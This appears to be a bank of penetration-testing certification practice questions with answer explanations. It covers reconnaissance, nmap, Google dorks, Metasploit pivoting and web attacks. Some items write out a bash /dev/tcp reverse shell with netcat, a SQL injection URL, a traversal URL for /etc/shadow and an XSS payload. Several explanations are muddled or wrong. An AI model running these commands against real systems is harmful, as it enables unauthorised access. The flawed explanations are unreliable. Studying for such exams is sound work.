You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You have just read an article on a security blog that described a new VoIP vulnerability and matching exploit that has been released. Which of the following DNS records could you use to find potential VoIP targets for your upcoming engagement? A. NS B. SRV C. MX D. TXT
Service (SRV) records are used to provide host and port information on services such as voice over IP (VoIP) and instant messaging (IM) applications. Mail Exchange (MX) records are used to provide the mail server that accepts email messages for a particular domain. Nameserver (NS) records are used to list the authoritative DNS server for a particular domain. Text (TXT) records are used to provide information about a resource such as a server, network, or service in human-readable form. They often contain domain verification and domain authentications for third-party tools that can send information on behalf of a domain name.
As a newly hired cybersecurity analyst, you are attempting to determine your organization's current public-facing attack surface. Which of the following methodologies or tools generates a current and historical view of the company's public-facing IP space? A. nmap B. Google hacking C. shodan.io D. Review network diagrams
Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company's public-facing internet assets since this might give rise to detection. This is also the first place an adversary might use to conduct reconnaissance on your company's network. The nmap scanning tool can provide an analysis of the current state of public exposure but has no mechanism to determine the history, nor will it give the same depth of information that shodan.io provides. Google Hacking can determine if a public exposure occurred over public-facing protocols, but it cannot conclusively reveal all the exposures present. Google hacking relies on using advanced Google searches with advanced syntax to search for information across the internet. Network diagrams can show how a network was initially configured. Unless the diagrams are up-to-date, which they usually aren't, they cannot show the current "as is" configuration. If you can only select one tool to find your attack surface's current and historical view, shodan is your best choice.
A cybersecurity analyst is preparing to run a vulnerability scan on a dedicated Apache server that will be moved into a DMZ. Which of the following vulnerability scans is most likely to provide valuable information to the analyst? A. Port scan B. Network vulnerability scan C. Web application vulnerability scan D. Database vulnerability scan
Since Apache is being run on the scanned server, this indicates a web server. Therefore, a web application vulnerability scan would be the most likely to provide valuable information. A network vulnerability scan or port scan can provide valuable information against any network-enabled server. Since an Apache server doesn't contain a database by default, running a database vulnerability scan is not likely to provide any valuable information to the analyst.
Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? A. Installation of anti-virus tools B. Use of a host-based IDS or IPS C. User and entity behavior analytics D. Implement endpoint protection platforms
Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning and may have a higher false-positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and embedded hardware, such as the Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.
Following an engagement, the penetration testing team has generated many recommendations for additional controls and items to be purchased to prevent future recurrences. Which of the following approaches BEST describes what the organization should do next? A. Contract an outside security consultant to provide an independent assessment of the network and outsource the remediation efforts B. Conduct a cost/benefit analysis of each recommendation against the company's current fiscal posture C. Immediately procure and install all of them because the adversary may attack at any time D. Create a prioritized list with all of the recommendations for review, procurement, and installation
Since an engagement has just finished, it is important to act swiftly since its results are a point-in-time assessment. The organization should still take a defined and deliberate approach to choosing the proper controls and risk mitigations. Therefore, execution through a rational business management process is the best approach, including creating a prioritized list of recommendations. Once this list has been created, the organization can conduct a cost/benefit analysis of each recommendation and determine which controls and items will be implemented in the network based upon resource availability in terms of time, person-hours, and money. This process does not need to be a long-term study or filled with complexity. Instead, it should be rapidly conducted due to the probability that an attacker may compromise the network using the same vulnerabilities the penetration testing team found in their engagement.
A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization's LAN. What is the best method for the penetration tester to use to conduct the pivot? A. Set the payload to propagate through meterpreter B. Issue the pivot exploit and setup meterpreter C. Reconfigure the network settings in meterpreter D. Create a route statement in meterpreter
Since the penetration tester has exploited the FTP server from outside the LAN, they will need to set up a route statement in meterpreter. Metasploit makes this very simple since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) and then create the routes needed.
A hacker successfully modified the sale price of items purchased through your company's website. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items' sale price? A. SQL injection B. Buffer overflow attack C. Changing hidden form values D. Cross-site scripting
Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the items' price in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer's boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.
The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant's security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems? A. Anti-virus software B. Log consolidation C. Intrusion prevention system D. Automated patch deployment
Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment and to prevent malicious activity. You could set up strict IPS rules to prevent unknown types of actions from being allowed to occur. Log consolidation is a good idea, but it won't prevent an issue and therefore isn't the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before conducting any patches. Often, patches will break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.
You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You want to identify any domain names also covered by the organization's digital certificate to include in your assessment. Which of the following should you review to determine any other domains that can use the same digital certificate? A. SAN B. Robots.txt C. CRL D. CSR
Subject alternative name (SAN) is a field in a digital certificate that allows a host to be identified by multiple host names or domain names. Certificates that use a SAN are referred to as multi-domain certificates. A certificate signing request (CSR) is a Base64 ASCII file generated on the device that needs a certificate and contains information that the certificate authority needs to create the certificate. The certificate revocation list (CRL) is a list of digital certificates that have been revoked before their expiration date and are now considered invalid. A robots.txt file tells search engine crawlers which URLs the crawler should index and access on your site.
Which file on a Linux system is modified to set the maximum number of days before a password must be changed? A. /etc/groups B. /etc/users C. /etc/shadow D. /etc/passwd
The /etc/shadow file stores the actual password in an encrypted format (more precisely, the hash of the password) for the user's account, along with additional properties related to the user's password. Basically, it stores secure user account information. All fields are separated by a colon (:) symbol. It contains one entry per line for each user listed in the /etc/passwd file. The last 6 fields provide password aging and account lockout features.
Dion Consulting Group was just hired to conduct an engagement against an online training organization located in Germany. Which of the following laws should a penetration tester review before conducting this engagement to ensure the security and confidentiality of the student information processed by the company? A. DPPA B. HIPAA C. GLBA D. GDPR
The General Data Protection Regulation (GDPR) is a regulation created in the European Union that creates provisions and requirements to protect the personal data of European Union (EU) citizens. Transfers of personal data outside the EU Single Market are restricted unless protected by like-for-like regulations, such as the US's Privacy Shield requirements. The Health Insurance Portability and Accountability Act (HIPAA) is a privacy rule that establishes national standards to protect the privacy of individuals' medical records. The Driver's Privacy Protection Act (DPPA) governs the privacy and disclosure of personal information gathered by state Departments of Motor Vehicles. The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to ensure the security and confidentiality of client information and take steps to keep customer information secure.
Which of the following penetration testing methodologies is focused on testing web applications and the people, processes, and technology that support them? A. Open Source Security Testing Methodology Manual (OSSTMM) B. OWASP Testing Guide (OTG) C. Penetration Testing Execution Standard (PTES) D. Information Systems Security Assessment Framework (ISSAF)
The Open Web Application Security Project (OWASP) is an organization aimed at increasing awareness of web security and provides a framework for testing during each phase of the software development process. The OWASP Testing Guide (OTG) provides different steps for the testing process and outlines the importance of assessing the entire organization, including the people, processes, and technology, during a penetration test. The Penetration Testing Execution Standard (PTES) was developed by business professionals as a best practice guide for conducting penetration testing. The PTES contains seven main sections that are used to provide a comprehensive overview of the proper structure of a complete penetration test. The Open Source Security Testing Methodology Manual (OSSTMM) was developed by the Institute for Security and Open Methodologies (ISECOM) and it outlines every area of an organization that needs testing and how to conduct the relevant tests. The Information Systems Security Assessment Framework (ISSAF) is an open-source resource available to cybersecurity professionals. The ISSAF is comprised of documents that relate to penetration testing, such as guidelines on business continuity and disaster recovery along with legal and regulatory compliance.
A coworker is conducting open-source intelligence gathering for an upcoming penetration test against Dion Training. You look over their shoulder and see them enter the following URL, https://www.google.com/search?q=password+filetype%3Axls+site%3Adiontraining.com&pws=0&filter=p. Which of the following is true about the results of this search? (SELECT THREE) A. Find sites related to diontraining.com B. Returns only files hosted at diontraining.com C. Personalization is turned off D. Excludes Microsoft Excel spreadsheets E. All search filters are deactivated F. Returns only Microsoft Excel spreadsheets
The above example searches for files with the name "password" in them (q=password) and (+) have a filetype equal to xls (filetype%3Axls, %3A is the hex-code for ':') and (+) limits the results to files hosted on diontraining.com (site%3Adiontraining.com) and (&) disables personalization (pws=0) and (&) deactivates the directory filtering function (filter=p). If you wanted to exclude Microsoft Excel spreadsheets, this would be done by typing -filetype%3Axls as part of the search query. To find related websites or pages, you would include the "related:" term to the query. To deactivate all filters from the search, the "filter=0" should be used. To deactivate the directory filtering function, the "filter=p" is used.
A penetration tester just entered the following command into a Bash shell on Dion Training's server: bash 1>& /dev/tcp/192.168.1.53/31337 0>&1 Before the penetration tester runs that command, what must they run first on their machine? A. nc 192.168.1.53 31337 B. bash 0>& /dev/tcp/127.0.0.1/31337 1>&0 C. nc -nlvp 31337 D. nc -e /bin/sh 192.168.1.53 31337
The bash command entered by the penetration tester on the Dion Training server is a redirector that sends information back to a listener. Therefore, the penetration tester needs to first set up a listener on their machine. This can quickly be done using netcat to set up a listener on port 31337 (nc -nvlp 31337). The bash command says to redirect the standard output (1) to a TCP socket connected to the IP (192.168.1.53) over port 31337. Then, the standard input (0) is redirected to the standard output (1). Since Bash treats TCP sockets established using this command as a two-way connection, it allows the penetration tester to gain a remote connection to the server by creating a reverse shell. To maintain persistence, the server could also be configured using crontab to run this Bash command every day at a certain time.
A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following mitigations should be performed to minimize the concern for the appliance and updates? A. Vulnerability scanning B. Scan and patch the device C. Automatic updates D. Configuration management
The best option here is vulnerability scanning as this allows the IT team to know what risks their network is taking on and where subsequent mitigations may be possible. Configuration management, automatic updates, and patching could normally be possible solutions, but these are not viable options without gaining administrative access to the appliance. Therefore, the analyst should continue to conduct vulnerability scanning of the device to understand the risks associated with it and then make recommendations to add additional compensating controls like firewall configurations, adding a WAF, providing segmentation, and other configurations outside the appliance that could minimize the vulnerabilities it presents.
Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. You are conducting a vulnerability scan of the hospital's enterprise network when you detect several devices that could be vulnerable to a buffer overflow attack. Upon further investigation, you determine that these devices are PLCs used to control the hospital's elevators. Unfortunately, there is not an update available from the elevator manufacturer for these devices. Which of the following mitigations do you recommend? A. Recommend isolation of the elevator control system from the rest of the production network through the change control process B. Recommend immediate replacement of the PLCs with ones that are not vulnerable to this type of attack C. Conduct a penetration test of the elevator control system to prove that the possibility of this kind of attack exists. D. Recommend immediate disconnection of the elevator's control system from the enterprise network
The best recommendation is to conduct the elevator control system's logical or physical isolation from the rest of the production network and the internet. This should be done through the change control process that brings the appropriate stakeholders together to discuss the best way to mitigate the vulnerability to the elevator control system that defines the business impact and risk of the decision. Sudden disconnection of the PLCs from the rest of the network might have disastrous results (i.e., sick and injured trapped in an elevator) if there were resources that the PLCs were dependent on in the rest of the network. Replacement of the elevators may be prohibitively expensive, time-consuming, and likely something that the hospital would not be able to justify to mitigate this vulnerability. Attempting further exploitation of the buffer overflow vulnerability might inadvertently trap somebody in an elevator or cause damage to the elevators themselves.
You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You want to identify any revoked digital certificates that you may use as part of a phishing campaign. Which of the following should you review to identify user certificates that were revoked before their expiration date? A. SAN B. CRL C. Robots.txt D. CSR
The certificate revocation list (CRL) is a list of digital certificates that have been revoked before their expiration date and are now considered invalid. Subject alternative name (SAN) is a field in a digital certificate that allows a host to be identified by multiple host names or domain names. Certificates that use a SAN are referred to as a multi-domain certificate. A certificate signing request (CSR) is a Base64 ASCII file generated on the device that needs a certificate and contains information that the certificate authority needs to create the certificate. A robots.txt file tells search engine crawlers which URLs the crawler should index and access on your site.
You are working as part of a penetration testing team conducting engagement against Dion Training's network. You have been given a list of targets in a text file called servers.txt. Which of the following Nmap commands should you use to find all the servers from the list with ports 80 and 443 enabled and save the results in a greppable file called results.txt? A. nmap -p80,443 -sL server.txt -oG results.txt B. nmap -p80,443 -sL servers.txt -oX results.txt C. nmap -p80,443 -iL servers.txt -oG results.txt D. nmap -p80,443 -iL servers.txt -oX results.txt
The command (nmap -p80,443 -iL servers.txt -oG results.txt) will only perform an Nmap scan against ports 80 and 443. The -iL option will scan each of the listed servers' IP addresses. The -oG option will save the results in a greppable format to the file results.txt while still displaying the normal results in the shell. The -sL option will only list the servers to scan, but it will not scan them. The -oX option is for outputting the results to a file in XML format.
Consider the following file called firewall.log that contains 53,682 lines that logged every connection going into and out of this network. The log file is in the following data format, as shown below with the first two lines of the log file: iptables,INPUT,eth0, IP, IP, 52, 0x00, 0x00, 128, 2242, TCP, 2564, 23 Which of the following commands would display all of the lines from the firewall.log file that contain the destination IP address of 10.1.0.10 and a destination port of 23? A. grep "10.1.0.10," firewall.log | grep "23" B. grep "10\.1\.0\.10\," firewall.log | grep "23" C. grep "10.1.0.10," firewall.log | grep "23$" D. grep "10\.1\.0\.10\," firewall.log | grep "23$"
The easiest way to do this is with a grep command. In Linux, you can chain together commands by piping data from one command's output to serve as the input to another command. In this scenario, you can use grep to find all the lines with the IP address first. Then, you can use the second grep command to find all the lines using port 23. The result is a smaller, filtered list of events to analyze. When using the dot in the IP addresses, you must remember to escape this character. Otherwise, grep treats it as a regular-expression metacharacter that matches any character (except a line break). By adding a backslash before the dot (\.), you make grep treat it simply as a literal dot or period. You must also escape the comma for it to be processed properly. The $ after the port number is used to indicate that the number should only be counted as a match if it is at the end of the line. This ensures that we only return the destination ports (DPT) matching 23 and not the source port (SPT).
You are conducting a quick nmap scan of a target network. You want to conduct a SYN scan, but you don't have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation? A. nmap -sS B. nmap -O C. nmap -sX D. nmap -sT
The nmap TCP connect scan (-sT) is used when the SYN scan (-sS) is not an option. You should use the -sT flag when you do not have raw packet privileges on your workstation or if you are scanning an IPv6 network. This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using a SYN scan. Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation. The -sX flag would conduct an Xmas scan, where the FIN, PSH, and URG flags are set in the scan. The -O flag would conduct an operating system detection scan of the target system.
You have just run the following commands on your Linux workstation: # more Names.txt DION DIOn DIon Dion dion # grep -i DION Names.txt Which of the following options would be included as part of the output for the grep command issued? (Select ANY that apply) A. DIOn B. DIon C. DION D. Dion E. dion
The grep (global search for regular expressions and print) command is one of Linux's most powerful search tools. The general syntax for the grep command is "grep [options] pattern [files]". The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i optional flag, it treats the specified pattern as case insensitive. Therefore, all uppercase and lowercase variations of the word "DION" will be found in the file and displayed as the command output. By default, grep is case sensitive, so "grep DION Names.txt" would only display "DION" and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) to quickly find indicators of compromise within your log files using grep.
You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You want to identify any web pages that contain the term "password" and whose URL contains diontraining.com in the hyperlink displayed on the page. Which of the following Google hacking queries should you use? A. password inurl:diontraining.com B. password site:diontraining.com C. password inanchor:diontraining.com D. password link:diontraining.com
The inanchor modifier is used to search for any pages whose anchor text includes the specified term and that have the search term provided somewhere on the page. For example, password inanchor:diontraining.com would return only page results that contain diontraining.com in the anchor text and have the search term "password" anywhere on the page. The link modifier is used to search for any pages that link to the website provided and have the search term anywhere on the page. For example, password link:diontraining.com would return only page results that link to Dion Training's website and have the text "password" anywhere on the page. The inurl modifier is used to search for any pages whose URLs include the term specified and have the search term anywhere on the page. For example, password inurl:diontraining.com would return only page results whose URLs include the text "diontraining.com" and have the text "password" somewhere on the page. The site modifier is used to search only the specified website for results that contain the search term. For example, password site:diontraining.com would return only results for the word password on pages located on the Dion Training website.
You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You attempted to run a Google hacking query by entering the following search options: "password inurl:diontraining.com". Which of the following results might be returned by your search parameters? A. https://www.dionsolutions.org/passwd B. https://www.passworddumps.com/diontraining C. https://www.jasondion.com/diontraining/password D. https://www.comptia.org/diontraining.com
The inurl modifier is used to search for any pages whose URLs include the term specified and have the search term anywhere on the page. For example, password inurl:diontraining.com would return only page results whose URLs include the text "diontraining.com" and have the text "password" somewhere on the page.
You are currently conducting passive reconnaissance in preparation for an upcoming penetration test against Dion Training. You want to identify any web pages that contain the term "password", and a link to diontraining.com. Which of the following Google hacking queries should you use? A. password inurl:diontraining.com B. password inanchor:diontraining.com C. password site:diontraining.com D. password link:diontraining.com
The link modifier is used to search for any pages that link to the website provided and have the search term anywhere on the page. For example, password link:diontraining.com would return only page results that link to Dion Training's website and have the text "password" anywhere on the page. The site modifier is used to search only the specified website for results that contain the search term. For example, password site:diontraining.com would return only results for the word password on pages located on the Dion Training website. The inurl modifier is used to search for any pages whose URLs include the term specified and have the search term anywhere on the page. For example, password inurl:diontraining.com would return only page results whose URLs include the text "diontraining.com" and have the text "password" somewhere on the page. The inanchor modifier is used to search for any pages whose anchor text includes the specified term and that have the search term provided somewhere on the page. For example, password inanchor:diontraining.com would return only page results that contain diontraining.com in the anchor text and have the search term "password" anywhere on the page.
During active reconnaissance, a penetration tester conducts a vulnerability scan. The most recent scan found several vulnerabilities on an organization's public-facing IP addresses. Which of the following vulnerabilities should the penetration tester attempt first in their exploitation phase? A. An HTTP response that reveals an internal IP address B. A cryptographically weak encryption cipher C. A website utilizing a self-signed SSL certificate D. A buffer overflow that is known to allow remote code execution
The most serious vulnerability discovered is one that could allow remote code execution to occur. Since this buffer overflow vulnerability is known to allow remote code execution, the penetration tester should attempt it first. If it is successfully exploited, the penetration tester should immediately notify the organization so it can be prioritized for remediation to prevent a future security breach. While the other issues may provide information or access for the penetration tester, the most critical would be a remote code execution vulnerability on a public-facing IP address.
You have been given access to a Windows system located on an Active Directory domain as part of a known environment penetration test. Which of the following commands would provide information about other systems on this network? A. net config B. net group C. net user D. net view
The net view command will list all the domains, computers, or resources (like network shares) that are being shared by the specified workstation. This will help to identify file servers and print servers on the network. The net group command can only be used on domain controllers. The net config command will allow server and workstation services to be controlled once they have already been identified. The net user command would show any user accounts on the local Windows workstation you are using.
Dion Training Solutions has just installed a backup generator for their offices that uses SCADA/ICS for remote monitoring of the system. The generator's control system has an embedded cellular modem that periodically connects to the generator's manufacturer to provide usage statistics. The modem is configured for outbound connections only, and the generator has no data connection with any of Dion Training's other networks. The manufacturer utilizes data minimization procedures and uses the data to recommend preventative maintenance service and ensure maximum uptime and reliability by identifying parts that need to be replaced. Which of the following cybersecurity risks is being assumed in this scenario? A. There is a minimal risk being assumed since the cellular modem is configured for outbound connections only B. There is a high risk being assumed since the presence of a cellular modem could allow an attacker to remotely disrupt the generator C. There is a critical risk being assumed since the cellular modem represents a threat to the enterprise network if an attacker exploits the generator and then pivots into the production environment. D. There is a medium risk being assumed since the manuf
There is a minimal risk being assumed in this scenario since the cellular modem is configured for outbound connections only. This also minimizes the risk of an attacker gaining remote access to the generator. The generator is logically and physically isolated from the rest of the enterprise network, so even if an attacker could exploit the generator, they could not pivot into the production network. While there is a risk of the manufacturer using the data for purposes other than originally agreed upon, this is a minimal risk due to the manufacturer's data minimization procedures and the type of data collected. Should the manufacturer choose to use usage statistics about the generator for some other purpose, it would have a negligible impact on the company since it does not contain any PII or proprietary company data.
Jason is conducting a penetration test against an organization's Windows network. He then enters a command into the shell and receives the following output: VulnerableService C:\Program Files\A Based on the output above, which of the following types of vulnerabilities does this Windows system contain? A. Writeable services B. Unsecure file/folder permissions C. Unquoted service path D. Clear text credentials in LDAP
This Windows machine contains an unquoted service path vulnerability, as shown in the output. If a service is created with an executable path that contains spaces and is not enclosed within quotes, then an unquoted service path vulnerability exists. In Windows, if the service path is not enclosed within quotes and contains spaces, the system treats each space as a break and passes the rest of the service path as an argument. If the service involved has SYSTEM privileges, an attacker could exploit this vulnerability and gain SYSTEM level access. This command finds the service name, executable path, display name, and auto-start setting of services in all directories except C:\Windows\ (since by default there is no service with an unquoted path containing spaces in this folder). As shown in the output, the service called "VulnerableService" has an unquoted service path.
While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of exploit are you attempting? A. Session hijacking B. Buffer overflow C. SQL injection D. XML injection
This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. A session hijacking attack consists of exploiting the web session control mechanism, normally managed via a session token. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic.
Susan, a penetration tester, is attempting to conduct an application-based attack against a test and development server. Susan enters the following URL, html;base64,PHNjcmlwdD5hbGVydCgnS== to attempt the attack. What type of attack is being attempted? A. Password spraying B. Cross-site scripting C. SQL injection D. XML injection
This is an example of a URL-based XSS (cross-site scripting) attack. A cross-site scripting attack uses a specially crafted URL that includes attack code that will cause information that users enter into their web browser to be sent to the attacker. In this example, everything from ?param onward is part of the attack. You can see the base64 encoded string being used. While you could not convert it during the exam without a base64 decoder, you should be able to tell that it is not a SQL injection nor an XML injection based on your studies. It is also not an attempt to conduct password spraying by logging into different usernames with the same password. So, by process of elimination, you can determine this is an XSS attack.
While conducting a penetration test of a web application, you enter the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of exploit are you attempting? A. Buffer overflow B. XML injection C. SQL injection D. Directory traversal
This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. SQL injection is the placement of malicious code in SQL statements via web page input.
Stephane was asked to assess the technical impact of reconnaissance performed against his organization. He has discovered that a third party has been performing reconnaissance by querying the organization's WHOIS data. Which category of technical impact should he classify this as? A. High B. Medium C. Low D. Critical
This would be best classified as a low technical impact. Since WHOIS data about the organization's domain name is publicly available, it is considered a low impact. This is further mitigated by the fact that your company gets to decide what information is published in the WHOIS data. Since only publicly available information is being queried and exposed, this can be considered a low impact.
You have been contracted to conduct a wireless penetration test for a corporate client. Which of the following should be documented and agreed upon in the scoping documents before you begin your assessment? A. The number of wireless access points and devices used by the client B. The network diagrams with the SSIDs of the wireless access points used by the client C. The frequencies of the wireless access points and devices used by the client. D. The make and model of the wireless access points used by the client
To ensure you are not accidentally targeting another organization's wireless infrastructure during your penetration test, you should have the frequencies of the wireless access points and devices used by the client documented in the scoping documents. This would include whether your clients use Wireless A, B, G, N, AC, or AX and if they are using the 2.4 GHz or 5.0 GHz spectrum for their communications. Often, this scoping document will also include the SSID names to ensure the penetration tester is assessing the wireless network owned by the organization and not someone else's by mistake.
You are conducting reconnaissance against Dion Training for an upcoming engagement. Last week, you read a press release on their website that mentioned a new security infrastructure being deployed soon, but you cannot remember the exact date for the deployment. You tried to navigate back to the press release on their website, but it seems to have been taken down. Which of the following can you use to find a copy of the press release? (Select TWO) A. Use a standard cache search by entering cache:https://diontraining.com B. Conduct a website crawl of https://diontraining.com to find the hidden document C. Use a network sniffer to capture API requests and responses from the site D. Use a website archive like archive.org to find a copy of the press release
To obtain older website information, you can use a standard cache search or a website archive. A standard cache search will produce a recent view of the website, but if the document you need was removed a long time ago, this will be ineffective. Website archives like archive.org (home of the Wayback Machine) create cached and archived copies of billions of web pages going back decades. Using a network sniffer to capture API requests and responses is a form of active reconnaissance, but it would not be useful in finding a specific webpage like the press release in this scenario. Conducting a website crawl can find hidden documents that are not indexed by search engines, but it will not find a document that has been removed or taken offline.
During the reconnaissance phase of a penetration test, you have determined that your client's employees all use iPhones that connect back to the corporate network over a secure VPN connection. Which of the following methods would MOST likely be the best method for exploiting these? A. Use social engineering to trick a user into opening a malicious APK B. Identify a jailbroken device for easy exploitation C. Use web-based exploits against the devices' web interfaces D. Use a tool like ICSSPLOIT to target specific vulnerabilities
When targeting mobile devices, you must first determine if the company uses iPhones or Android-based devices. If they are using an iPhone, it becomes much more difficult to attack since iPhone users can only install trusted apps from the App Store. If the user has jailbroken their phone, they can sideload apps and other malware. After identifying a jailbroken device, you can use social engineering to trick the user into installing your malicious code and then take control of their device.
You are planning to exploit a network-based vulnerability against an organization as part of a penetration test. You attempted to connect your laptop to the network jack in their conference room. You found yourself in the highly restricted VLAN that the organization allows its visitors to connect to when conducting presentations. This VLAN only allows you to access the internet, not the internal network. You decide you need to conduct VLAN hopping. Which of the following methods would be MOST likely to succeed? A. Harvest the user credentials of an employee and use those to connect B. Spoof the MAC address of the room's VOIP phone to your laptop C. Poison or overflow the MAC table of the switch D. Connect a wireless access point to the conference room's network jack
VLAN hopping is the act of illegally moving from one VLAN to another. A VLAN (virtual LAN) is a logical grouping of switch ports extending across any number of switches on an Ethernet network. One of the most common VLAN hopping methods is to overflow the MAC table on a vulnerable switch. When this occurs, the switch defaults to operating as a hub and repeats all frames being received through all of its ports. This "fail open" behavior ensures the network can continue to operate, but it is a security risk that can be exploited by the penetration tester.
Which of the following is the most difficult to confirm with an external vulnerability scan? A. Cross-site request forgery (XSRF/CSRF) B. Unpatched web server C. Cross-site scripting (XSS) D. Blind SQL injection
Vulnerability scanners typically cannot confirm that a blind SQL injection with the execution of code has previously occurred. XSS and CSRF/XSRF are typically easier to detect because the scanner can pick up information that proves a successful attack. The banner information can usually identify unpatched servers.
What system contains a publicly available set of databases with registration contact information for every domain name on the Internet? A. IETF B. CAPTCHA C. IANA D. WHOIS
WHOIS is a query and response protocol widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. WHOIS is also used for a broader range of information. The protocol stores and delivers database content in a human-readable format and is publicly available for use. The Internet Assigned Numbers Authority is a standards organization that oversees global IP address allocation, autonomous system number allocation, root zone management in the Domain Name System, media types, and other Internet Protocol-related symbols and Internet numbers. A CAPTCHA is a type of challenge-response test used in computing to determine whether the user is human. The Internet Engineering Task Force (IETF) is an open standards organization that develops and promotes voluntary Internet standards, particularly the standards that comprise the Internet protocol suite.
You have conducted a Google search for the "site:diontraining.com -site:sales.diontraining.com financial." What results do you expect to receive? A. Google results for keyword matches on diontraining.com and sales.diontraining.com that include the word "financial" B. Google results for keyword matches from the site sales.diontraining.com that are in the domain diontraining.com but do not include the word financial C. Google results matching all words in the query D. Google results matching "financial" in domain diontraining.com, but no results from the site sales.diontraining.com
When conducting a Google search, using site:AAA in the query will return results only from that website (AAA). If you use -site:AAA, you will get results that are not on the website (AAA). In the case of this question, no results should show up from sales.diontraining.com. All results should only come from diontraining.com.
A penetration tester is conducting software assurance testing on a web application for Dion Training. You discover the web application is vulnerable to an SQL injection and could disclose a regular user's password. Which of the following actions should you perform? A. Recommend that the company conduct a full penetration test of their systems to identify other vulnerabilities B. Document the finding with an executive summary, methodology used, and a remediation recommendation C. Conduct a proof-of-concept exploit on three user accounts at random and document this in your report D. Contact the development team directly and recommend adding input validation to the web application
When you find a vulnerability, it should be documented fully. This includes providing an executive summary for management, the methodology used to find the vulnerability so that others can recreate and verify it, and the recommended remediation actions that should be taken. You should not exploit three random accounts on the server, which could negatively impact the client's reputation. You should not contact the development team directly since they may ignore your recommendation, and they did not hire you. While it may be a good idea to conduct a full-scale penetration test, that would not necessarily solve this vulnerability.
You are reverse engineering a malware sample using the Strings tool when you notice the code inside appears to be obfuscated. You look at the following line of output on your screen: asdfghkloiuytrewsxcvbnuDFRDCVBNJYTF Based on the output above, which of the following methods do you believe the attacker used to prevent their malicious code from being easily read or analyzed? A. QR coding B. Base64 C. XML D. SQL
While there are many different formats used by attackers to obfuscate their malicious code, Base64 is by far the most popular. If you see a string like the one above, you can decode it using an online Base64 decoder. I recommend you copy the string above and decode it to see how easy it is to reverse a standard Base64 encoded message. Some more advanced attackers will also use XOR and a key shift in combination with Base64 to encode the message and make it harder to decode, but using a tool like CyberChef can help you decode those. Structured Query Language (SQL) is used to communicate with a database. Extensible Markup Language (XML) is a markup language that defines a set of rules for encoding documents in a human-readable and machine-readable format. SQL and XML are not considered obfuscation techniques. A QR Code is a two-dimensional version of the barcode, known from product packaging in the supermarket. QR coding is the process of converting some data into a single QR code. QR coding might be considered a form of obfuscation, but it is not shown in this question's example output.
